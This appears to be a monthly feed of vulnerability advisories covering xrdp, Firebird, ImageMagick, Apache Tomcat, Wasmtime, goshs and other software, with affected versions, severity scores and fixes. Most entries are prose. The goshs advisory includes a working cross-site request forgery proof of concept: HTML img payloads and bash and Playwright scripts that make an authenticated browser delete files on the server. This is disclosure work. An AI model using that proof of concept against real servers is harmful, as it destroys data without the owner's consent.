Suse
Monthly
Out-of-bounds read in xrdp RDP server versions ≤0.10.5 allows remote unauthenticated attackers to crash the service or disclose process memory by sending a malformed Confirm Active PDU during RDP capability negotiation. Attack complexity is low but requires user interaction. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis. Vendor-released patch available in version 0.10.6 per GitHub security advisory GHSA-rvh9-9wm3-28c7.
Heap-based buffer overflow in xrdp's NeutrinoRDP module (versions ≤0.10.5) enables malicious downstream RDP servers or MitM attackers to achieve remote code execution or denial of service when proxying RDP sessions. Exploitation requires the victim xrdp server to have the non-default NeutrinoRDP module compiled and enabled (--enable-neutrinordp), and a user must initiate an RDP session through the affected proxy to a malicious server. EPSS data unavailable; no CISA KEV listing indicates targeted rather than widespread exploitation. Fixed in version 0.10.6.
Missing MAC signature verification in xrdp 0.10.5 and earlier allows man-in-the-middle attackers to modify encrypted RDP traffic without detection when Classic RDP Security layer is used. Unauthenticated network attackers with MITM position can alter packet contents in transit, achieving high integrity and confidentiality impact on both vulnerable and subsequent systems (CVSS 9.3, CVSS:4.0 with scope change). TLS security layer deployments are not affected. Vendor patch released in version 0.10.6. No active exploitation or public POC identified at time of analysis, but EPSS data unavailable for risk assessment.
Privilege escalation to root in xrdp 0.10.5 and earlier allows authenticated local attackers to execute arbitrary code due to improper error handling during privilege drop in the session execution component. The flaw requires low attack complexity and no user interaction (CVSS 8.8, AV:L/AC:L/PR:L/UI:N). Vendor-released patch available in xrdp v0.10.6. No public exploit or active exploitation confirmed at time of analysis, though CVSS scope change (S:C) indicates potential container/VM escape scenarios.
Remote code execution in Firebird RDBMS versions prior to 5.0.4, 4.0.7, and 3.0.14 allows authenticated users with CREATE FUNCTION privileges to execute arbitrary code as the database server process through path traversal in the external engine plugin loader. The vulnerability stems from insufficient input validation (CWE-22) when concatenating user-supplied engine names into filesystem paths, enabling attackers to load malicious shared libraries from arbitrary locations. With CVSS 10.0 and scope change (S:C), successful exploitation grants full system compromise beyond database boundaries. EPSS data not provided, no CISA KEV listing identified, indicating targeted rather than widespread exploitation at time of analysis. Vendor-released patches available across all affected major versions.
Firebird database server crashes via crafted slice packet exploiting zero-length SDL descriptor validation flaw. Remote unauthenticated attackers can trigger division-by-zero errors in the sdl_desc() function to cause denial of service against Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates trivial remote exploitation with no authentication required. EPSS data not available; no public exploit identified at time of analysis, though technical details in GitHub advisory may facilitate reproduction.
Remote denial-of-service in Firebird Database Server versions prior to 5.0.4, 4.0.7, and 3.0.14 allows unauthenticated network attackers to crash the server via crafted XDR-encoded op_response packets. The xdr_status_vector() function fails to handle isc_arg_cstring status vector types during packet decoding, triggering immediate server termination. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) and CWE-228 (Improper Handling of Syntactically Invalid Structure), this represents a high-severity availability risk for internet-exposed Firebird instances. No active exploitation confirmed, but exploit development is trivial given the low attack complexity.
Buffer overflow in Firebird RDBMS allows remote unauthenticated attackers to crash database servers via malformed slice packets. Affects Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14 across all three maintained major release branches. The xdr_datum() deserialization function fails to validate cstring lengths against slice descriptor bounds during packet processing, enabling heap buffer overflow. CVSS 7.5 (High) with network attack vector and no authentication required. EPSS data not available, no KEV listing identified, but public vendor advisory and tagged releases confirm the issue and provide specific fix versions.
Null pointer dereference in Firebird SQL server causes remote denial-of-service when unauthenticated attackers send malformed op_crypt_key_callback packets. Firebird versions prior to 5.0.4, 4.0.7, and 3.0.14 are affected. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms trivial remote exploitation requiring no authentication or user interaction, allowing attackers who know only the server's IP and port to crash database services. The integrity impact rating (I:L) suggests potential for limited data corruption alongside the high availability impact. Vendor-released patches are available in versions 5.0.4, 4.0.7, and 3.0.14. No public exploit code or CISA KEV listing identified at time of analysis, though the low attack complexity makes weaponization straightforward.
Integer overflow in Firebird database versions prior to 5.0.4, 4.0.7, and 3.0.14 allows authenticated users with INSERT privileges to trigger a denial of service via a malformed Batch Parameter Block that overflows the totalLength value in ClumpletReader::getClumpletSize(), causing infinite loop conditions on the server.
Remote denial-of-service in Firebird database server versions prior to 5.0.4, 4.0.7, and 3.0.14 allows unauthenticated network attackers to crash the server via malformed authentication packets. Exploitable by sending out-of-order CNCT_specific_data segments during connection setup, triggering a negative size calculation and segmentation fault. No authentication, credentials, or special configuration required - only knowledge of server IP and port. CVSS 8.2 (High) with network vector, low complexity, and no privileges required. No public exploit code or active exploitation (CISA KEV) identified at time of analysis, though the attack surface is maximally exposed given the unauthenticated network vector and low complexity (AV:N/AC:L/PR:N).
Remote unauthenticated denial of service in Firebird SQL database server versions prior to 6.0.0/5.0.4/4.0.7/3.0.14 allows attackers to crash the database by sending a malformed op_slice network packet that triggers a null pointer dereference in the SDL_info() function. Attack requires only network access to the database port with no authentication (CVSS AV:N/AC:L/PR:N). No public exploit code identified at time of analysis, and EPSS data not available for this recent CVE. Fixed versions released by vendor across all maintained branches.
Information disclosure in Firebird 3.x client library when connecting to Firebird 4+ servers allows local authenticated users to leak sensitive data through incorrect XSQLDA field length values. The vulnerability requires both the FB3 client library and an FB4+ server in the deployment. No active exploitation confirmed (not in CISA KEV), but CVSS 7.9 with scope change (S:C) indicates potential cross-boundary impact. Remediation requires upgrading the client library to Firebird 4.0.0 or higher.
Out-of-bounds write in dnsmasq's DHCP split-relay handler allows remote unauthenticated denial of service via crafted BOOTREPLY packets. Affects Red Hat Enterprise Linux 6-10 and OpenShift Container Platform 4 when dnsmasq runs with the --dhcp-split-relay option enabled. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates trivial network exploitation, but real-world risk is mitigated by the non-default configuration requirement. No public exploit or active exploitation (CISA KEV) confirmed at time of analysis, though CWE-787 (out-of-bounds write) primitives are well-understood by attackers.
Insuffient checks of the RMP on host buffer access in IOMMU may allow an attacker with privileges and a compromised HV to trigger an out of bounds condition without RMP checks resulting in a. Rated medium severity (CVSS 5.6).
A NULL pointer dereference vulnerability exists in fio (Flexible I/O Tester) v3.41 when parsing job files containing the fdp_pli option. The callback function str_fdp_pli_cb() does not validate the input pointer and calls strdup() on a NULL value when the option is specified without an argument. This results in a segmentation fault and process crash.
Command injection in radare2's rabin2 PDB parser allows local attackers to execute arbitrary commands when the tool is compiled without SSL support on UNIX systems. The vulnerability (CWE-78) affected a narrow window between commits 01ca2f6 and 9236f44 (post-6.1.2, pre-6.1.3), spanning less than one week in the development timeline. CVSS 7.4 (HIGH) reflects local attack vector with high complexity but no authentication required. No active exploitation confirmed (not in CISA KEV), though publicly available exploit code exists. EPSS data not provided. Fixed in commit 9236f44a28 per GitHub PR #25651.
Logic error in Luanti 5 (formerly Minetest) game engine before 5.15.2 allows malicious mods to gain unauthorized access to security-restricted APIs by intercepting mod environment setup. When any mod is designated as trusted (via secure.trusted_mods or secure.http_mods), a specially crafted mod can exploit the environment initialization sequence to receive the insecure environment or HTTP API access intended only for trusted mods. CVSS 8.1 reflects local attack vector with high complexity but no authentication required and scope change with high confidentiality/integrity/availability impact. GitHub security advisory and two fix commits confirm patch availability. No CISA KEV listing or public exploit code identified at time of analysis.
Cross-site scripting (XSS) in ApostropheCMS 4.28.0 and sanitize-html 2.17.1 allows remote attackers to bypass HTML tag filtering and inject arbitrary tags through entity-encoded payloads in textarea and option elements. A regression in the sanitize-html parser incorrectly assumes htmlparser2 does not decode entities within non-text elements, causing encoded HTML to be decoded and written directly to output without sanitization. Exploitation requires non-default configurations where textarea or option tags are in the allowedTags list, commonly found in form builders, and user interaction to submit form content. No active exploitation has been identified at time of analysis, but the vulnerability is trivial to exploit once configuration conditions are met.
### Summary A denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections. ### Details Two inefficient multipart parsing paths could be abused with attacker-controlled input. Before the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary. ### Impact An attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application. ### Mitigation Upgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.
A flaw was found in FFmpeg. A remote attacker could exploit this vulnerability by providing a specially crafted MPEG-PS/VOB media file containing a malicious DVD subtitle stream. This vulnerability is caused by a signed integer overflow in the DVD subtitle parser's fragment reassembly bounds checks, leading to a heap out-of-bounds write. Successful exploitation can result in a denial of service (DoS) due to an application crash, and potentially lead to arbitrary code execution.
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Video in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit termination, it results in an out-of-bounds read when processed by functions like snprintf(). A local attacker could potentially trigger this vulnerability by initiating a crafted passkey authentication request, causing the SSSD PAM responder to crash, resulting in a local Denial of Service (DoS).
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized access to subresources, potentially disclosing sensitive information or performing actions they are not permitted to do. Additionally, legitimate users may be denied access to resources.
### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Authorization bypass in sigstore/timestamp-authority verifier allows attackers to prepend forged certificates to PKCS#7 certificate bags, causing the library to validate signatures with one certificate while performing authorization checks on another. The vulnerability affects the `VerifyTimestampResponse` function in timestamp-authority/v2/pkg/verification, enabling attackers to bypass authorization controls on timestamp verification. This impacts only library consumers, not the timestamp-authority service itself, and sigstore-go is unaffected due to its use of the `TSACertificate` mitigation option. EPSS 5.5, actively exploitable via local interaction.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, an off by one error in the MSL decoder could result in a crash when a malicous MSL file is read. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below 7.1.2-19 and 6.9.13-44 contain a heap use-after-free vulnerability that can cause a crash when reading and printing values from an invalid XMP profile. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below both 7.1.2-19 and 6.9.13-44, contain a heap out-of-bounds write in the JP2 encoder with when a user specifies an invalid sampling index. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, the JXL encoder has an heap write overflow when a user specifies that the image should be encoded as 16 bit floats. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, a crafted image could result in an out of bounds heap write when writing a yaml or json output, resulting in a crash. This issue has been fixed in version 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the -sample operation has an out of bounds read when an specific offset is set through the `sample:offset` define that could lead to an out of bounds read. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a stack overflow vulnerability in ImageMagick's FX expression parser allows an attacker to crash the process by providing a deeply nested expression. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.
When `Magick` parses an XML file it is possible that a single zero byte is written out of the bounds.
An integer overflow in the despeckle operation causes a heap buffer overflow on 32-bit builds that will result in an out of bounds write. ``` ==1551685==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xea2fb818 at pc 0x56cbc42a bp 0xffc4ce48 sp 0xffc4ce38 WRITE of size 8 at 0xea2fb818 thread T0 ```
In viff encoder contains an integer truncation/wraparound issue on 32-bit builds that could trigger an out of bounds heap write that can result in a crash.
Null pointer dereference in the Linux kernel's RDS-over-InfiniBand (RDS/IB) subsystem allows a local low-privileged user to crash the kernel by sending an RDS_CMSG_RDMA_MAP control message before an IB connection is fully established. The impact is a complete denial of service (kernel panic) with no confidentiality or integrity exposure, scoring CVSS 5.5. No public exploit code has been identified at time of analysis, and EPSS exploitation probability is extremely low at 0.02%, consistent with the specialized InfiniBand hardware prerequisite.
Integer underflow in libexif version 0.6.25 and earlier during Fuji and Olympus MakerNote decoding allows local attackers to crash applications or leak sensitive memory information. The vulnerability requires local access and specific user interaction (high complexity) but affects all applications linking libexif, creating a supply-chain exposure for image processing tools.
Integer overflow in libexif through 0.6.25 Nikon MakerNote handling allows local attackers on 32-bit systems to trigger crashes or read sensitive memory, requiring high attack complexity and no user interaction. This affects only 32-bit architectures due to the integer arithmetic involved; EPSS probability is low given the local-only attack vector and high complexity prerequisite, but patch availability is currently unconfirmed.
Local privilege escalation in KeePassXC password manager allows authenticated attackers with low privileges to execute arbitrary code by exploiting insecure OpenSSL configuration file loading. When a target user launches KeePassXC, malicious configuration planted in an unsecured path is loaded, enabling code execution in KeePassXC's security context. Attack requires user interaction and prior low-privileged access. CVSS 7.3 (AV:L/AC:L/PR:L/UI:R). No public exploit identified at time of analysis.
Critical authorization bypass in goshs (Go-based HTTP server) versions prior to 2.0.0-beta.4 allows unauthenticated attackers to upload, delete, and modify files in directories protected by .goshs ACL configurations. Attackers can execute state-changing operations (PUT uploads, POST /upload, directory creation via ?mkdir, file deletion via ?delete) without credentials, bypassing documented per-folder authentication mechanisms. Deleting the .goshs file itself removes authentication policies, enabling unrestricted access to previously protected content. Affects confidentiality, integrity, and availability of protected resources. No public exploit identified at time of analysis.
Path traversal in patrickhener goshs SFTP rename operation enables authenticated attackers to write files outside the configured root directory. Versions 1.0.7 through 2.0.0-beta.3 fail to sanitize destination paths in SFTP rename commands, allowing low-privileged users to overwrite arbitrary filesystem locations with network access. High integrity impact with scope change indicates potential host compromise. No public exploit identified at time of analysis.
CPython's base64.b64decode() function prematurely stops processing after encountering the first padded quad, allowing malformed base64 data to be accepted that may be interpreted differently by other implementations. This affects CPython 3.13.x before 3.13.13, 3.14.x before 3.14.4, and 3.15.0a1 before 3.15.0a8, with authenticated remote attackers on high-complexity networks potentially inducing information disclosure (CVSS 6.0, EPSS risk level moderate). Upstream fixes are available in tagged commits; users should upgrade to patched versions or enable validate=True parameter for stricter base64 validation.
Heap buffer overflow in HDF5 library versions 1.14.1-2 and earlier allows local attackers to trigger a write-based overflow in the H5T__ref_mem_setnull method by crafting malicious HDF5 files, leading to denial-of-service and potential remote code execution depending on heap exploitation complexity. Attack requires local file access and user interaction to parse a malicious file. No public exploit code identified at time of analysis.
Denial of service in systemd 260 allows local unprivileged users to crash the systemd daemon by triggering an assert via IPC API calls containing arrays or maps with null elements. The vulnerability affects systemd versions 260 through 260, with no public exploit code identified at time of analysis. EPSS score of 6.2 reflects moderate real-world risk due to local-only attack vector and non-privileged requirements.
Escape-to-host vulnerability in systemd nspawn (versions 233-259) allows local privileged users to break container isolation via a crafted optional config file, enabling arbitrary code execution on the host system. CVSS 6.4 reflects high integrity and confidentiality impact but requires high privilege and difficult attack conditions. No public exploit code or active exploitation has been confirmed at the time of analysis.
Stack-based buffer overflow in NASM's disasm() function enables unauthenticated denial-of-service when processing malicious assembly input. Attacker-controlled disassembly formatting triggers out-of-bounds write when string length exceeds buffer capacity, causing application crash. Affects NASM assembler version 3.02rc5. Publicly available exploit code exists. CVSS 7.5 (High) reflects network-accessible attack vector requiring no privileges or user interaction, with availability impact only.
Integer overflow in the Linux kernel's USB gadget mass storage driver (f_mass_storage) allows a malicious USB host to corrupt kernel memory or trigger out-of-bounds accesses on any Linux system acting as a USB storage gadget. The flaw affects kernel versions tracing back to Linux 3.3 (commit 144974e7f9e32b53b02f6c8632be45d8f43d6ab5), with vendor-released patches now available across multiple stable branches. No public exploit has been identified at time of analysis, and EPSS exploitation probability stands at a very low 0.02%, consistent with the physical USB access prerequisite.
Helm versions 3.20.1 and earlier, and 4.1.3 and earlier, allow local attackers with user interaction to write Chart contents to arbitrary directories via path traversal in the helm pull --untar command. A specially crafted Chart will bypass the expected subdirectory naming convention and extract files to the current working directory or a user-specified destination, potentially overwriting existing files. Vendor-released patches are available in versions 3.20.2 and 4.1.4.
CLIENT_CERT authentication bypass in Apache Tomcat allows unauthenticated remote attackers to bypass certificate-based authentication when soft fail is disabled and Foreign Function Memory (FFM) is enabled, affecting Tomcat 9.0.92-9.0.116, 10.1.22-10.1.53, and 11.0.0-M14-11.0.20. The vulnerability has a CVSS score of 6.5 with high confidentiality impact and partial integrity impact; however, the EPSS score of 0.04% (11th percentile) indicates very low real-world exploitation probability, and no public exploit code or confirmed active exploitation has been identified.
Apache Tomcat's cloud membership clustering component logs Kubernetes bearer tokens in plaintext, enabling unauthenticated remote attackers to extract authentication credentials from log files. Affects Tomcat 9.0.13-9.0.116, 10.1.0-M1-10.1.53, and 11.0.0-M1-11.0.20. CVSS 7.5 (High) reflects confidentiality impact; no public exploit identified at time of analysis. Exploitation requires network access to log files or log aggregation systems, potentially enabling privilege escalation within Kubernetes clusters.
Information disclosure in Apache Tomcat's JsonAccessLogValve allows unauthenticated remote attackers to retrieve sensitive data due to improper output encoding. Affects Tomcat versions 11.0.0-M1 through 11.0.20, 10.1.0-M1 through 10.1.53, and 9.0.40 through 9.0.116. The vulnerability enables high-impact confidentiality breaches through network-accessible attack vectors with low complexity and no user interaction required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.02%).
Improper input validation in Apache Tomcat allows remote unauthenticated attackers to obtain sensitive information via an incomplete fix of the prior CVE-2025-66614 vulnerability. Affected versions include Tomcat 11.0.15-11.0.19, 10.1.50-10.1.52, and 9.0.113-9.0.115. The CVSS score of 5.3 reflects low confidentiality impact with no integrity or availability impact, and the 0.04% EPSS score indicates minimal real-world exploitation probability at time of analysis with no public exploit code or KEV status confirmed.
Authentication bypass in Apache Tomcat 9.x through 11.x and Tomcat Native 1.1.23-2.0.13 allows unauthenticated remote attackers to bypass CLIENT_CERT authentication when soft-fail is disabled, achieving unauthorized access to confidentiality- and integrity-sensitive resources. Exploitation requires no user interaction or privileges (CVSS:3.1 PR:N/UI:N). The flaw affects CLIENT_CERT authentication logic, permitting access under conditions where authentication should fail. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.04%).
Cipher preference order enforcement failure in Apache Tomcat 9.0.114-9.0.115, 10.1.51-10.1.52, and 11.0.16-11.0.18 allows unauthenticated remote attackers to force selection of weaker cryptographic ciphers during TLS negotiation, enabling potential decryption of confidential data transmitted over HTTPS connections. The vulnerability stems from improper preservation of administrator-configured cipher suite priority, potentially exposing sensitive session data, credentials, or application content. No public exploit identified at time of analysis. CVSS 7.5 (High) reflects network-accessible confidentiality impact requiring no privileges.
Open redirect vulnerability in Apache Tomcat's LoadBalancerDrainingValve allows unauthenticated remote attackers to redirect users to untrusted sites via crafted URLs. Affects Tomcat 11.0.0-M1 through 11.0.18, 10.1.0-M1 through 10.1.52, 9.0.0.M23 through 9.0.115, and 8.5.30 through 8.5.100. The vulnerability requires user interaction (clicking a malicious link) and has low real-world exploitation probability (EPSS 0.01%), with no public exploit code or confirmed active exploitation identified at the time of analysis.
HTTP request smuggling in Apache Tomcat 7.x through 11.x permits unauthenticated remote attackers to manipulate request routing and bypass security controls via malformed chunk extension processing. Exploitation enables header injection, cache poisoning, and request routing manipulation without code execution. Affects Tomcat 7.0.0-7.0.109, 8.5.0-8.5.100, 9.0.0.M1-9.0.115, 10.1.0-M1-10.1.52, and 11.0.0-M1-11.0.18. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.02%).
Path traversal in flatpak-builder 1.4.5 through 1.4.7 enables arbitrary host file exfiltration through license-files manifest exploitation. Attacker-crafted manifest with symlink manipulation bypasses g_file_get_relative_path() and g_file_query_file_type() validation, allowing reads outside source directory. Successful exploitation requires user interaction (processing malicious manifest) but grants unauthenticated remote attackers high confidentiality impact with no authentication required. Publicly available exploit code exists. CVSS 7.1 reflects network vector with user participation prerequisite.
Wasmtime prior to versions 24.0.7, 36.0.7, 42.0.2, and 43.0.1 allows authenticated remote attackers to corrupt memory by providing malicious realloc return values during string transcoding between WebAssembly components, enabling writes to arbitrary memory locations up to 4GiB away from linear memory base. On default configurations with 4GiB virtual memory reservation and guard pages, exploitation typically triggers process abort via unmapped memory access; however, configurations with reduced memory reservation and disabled guard pages risk corruption of host data structures or other guest linear memories.
Wasmtime versions 25.0.0 through 36.0.6, 42.0.0-42.0.1, and 43.0.0 contain a compiler type-checking bug in the Winch backend where the table.grow operator returns incorrectly typed 64-bit values instead of 32-bit values for 32-bit tables, enabling read/write access to 16 bytes of host memory preceding linear memory and resulting in denial of service when Wasmtime detects the unauthorized access. The vulnerability requires explicit selection of the non-default Winch compiler backend and either disabled guard pages or modified memory layout to achieve information disclosure; default Wasmtime configurations using the Cranelift compiler and standard guard page placement are unaffected. No public exploit code or active exploitation has been identified, though the attack vector is remote and requires low-privilege authenticated access.
Memory sandbox escape in Wasmtime's Winch compiler (versions 25.0.0 to before 36.0.7, 42.0.2, 43.0.1) enables authenticated WebAssembly guests to access arbitrary host process memory outside linear-memory boundaries. Exploitation requires non-default Winch backend activation via -Ccompiler=winch flag. Attackers can read up to 32KiB before memory start or ~4GiB after, with theoretical potential for unlimited in-process memory access due to improper 32-bit offset handling in 64-bit registers. Consequences include host process crashes (DoS), sensitive data exfiltration, or remote code execution through memory writes. Affects aarch64 (confirmed PoC) and x86-64 (theoretical). Publicly available exploit code exists.
Out-of-bounds read in osslsigncode versions 2.12 and earlier allows local attackers to crash the application via crafted PE files with malicious section headers during page-hash computation. The vulnerability exists in the pe_page_hash_calc() function, which fails to validate that section headers' PointerToRawData and SizeOfRawData values reference valid file regions. An attacker can trigger the flaw by providing a malicious PE file for signing with page hashing enabled (-ph flag) or by providing an already-signed malicious PE file for verification, where verification does not require the -ph flag. CVSS 5.5 with high availability impact; no public exploit identified at time of analysis.
Osslsigncode 2.12 and earlier contains an integer underflow in PE page-hash computation that allows local attackers to trigger an out-of-bounds heap read and crash the process via a specially crafted PE file with SizeOfHeaders larger than SectionAlignment. The vulnerability is triggered either when signing a malicious PE file with page hashing enabled (-ph flag) or when verifying an already-signed PE file containing page hashes, making verification particularly dangerous since no special flags are required. This is a denial-of-service vulnerability with no public exploit code identified at time of analysis, though the root cause (missing validation in integer subtraction) is straightforward to exploit.
Stack buffer overflow in osslsigncode <2.12 allows local attackers to execute arbitrary code during signature verification. The vulnerability affects PE, MSI, CAB, and script file verification handlers that copy digest values from SpcIndirectDataContent structures into fixed 64-byte stack buffers without length validation. Attackers craft malicious signed files with oversized digest fields triggering memcpy overflow when users verify files via osslsigncode verify command, corrupting stack state and enabling code execution with high confidentiality, integrity, and availability impact.
